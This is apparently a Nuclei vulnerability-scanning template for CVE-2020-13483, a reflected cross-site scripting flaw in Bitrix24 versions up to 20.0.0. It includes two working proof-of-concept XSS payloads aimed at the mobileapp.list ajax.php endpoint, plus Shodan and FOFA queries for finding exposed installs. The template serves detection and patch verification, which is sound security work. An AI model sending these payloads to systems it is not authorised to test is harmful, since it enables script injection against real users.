id: CVE-2020-13483

info:
  name: Bitrix24 <=20.0.0 - Cross-Site Scripting
  author: pikpikcu,3th1c_yuk1
  severity: medium
  description: The Web Application Firewall in Bitrix24 up to and including 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Bitrix24 (version >20.0.0) to mitigate this vulnerability.
  reference:
    - https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
    - https://twitter.com/brutelogic/status/1483073170827628547
    - https://nvd.nist.gov/vuln/detail/CVE-2020-13483
    - https://github.com/afinepl/research
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-13483
    cwe-id: CWE-79
    epss-score: 0.00113
    epss-percentile: 0.44743
    cpe: cpe:2.3:a:bitrix24:bitrix24:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: bitrix24
    product: bitrix24
    shodan-query: http.html:"/bitrix/"
    fofa-query: body="/bitrix/"
  tags: cve2020,cve,xss,bitrix,bitrix24

http:
  - method: GET
    path:
      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=<a+href="/*">*/%29%7D%29;function+__MobileAppList()%7Balert(1)%7D//>'
      - '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<a href="/*">*/)});function __MobileAppList(){alert(1)}//'
          - "function(handler){};function __MobileAppList(test){alert(document.domain);};//</div>"
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022029343ebc38d2dfc9915247a5347f0cb9d35678dfee04d9ffc97299f18e678b660221008aef7a72fe4381a4c785e769b503bd48816987aae9d68f12fe3c47f9855ab647:922c64590222798bb761d5b6d8e72950